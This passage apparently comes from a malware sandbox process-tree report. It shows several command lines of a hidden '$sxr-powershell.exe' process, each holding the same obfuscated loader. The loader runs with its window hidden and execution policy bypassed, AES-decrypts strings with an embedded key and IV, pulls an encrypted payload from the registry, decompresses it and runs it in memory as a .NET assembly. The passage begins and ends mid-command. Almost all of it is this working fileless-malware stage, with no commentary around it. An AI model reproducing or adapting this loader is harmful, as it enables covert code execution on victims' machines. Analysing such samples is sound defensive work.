$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:7140
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3744).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:9872
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3744" "2792" "2740" "2796" "0" "0" "2800" "0" "0" "0" "0" "0"
        29⤵
        
        PID:7536
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:8060
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = 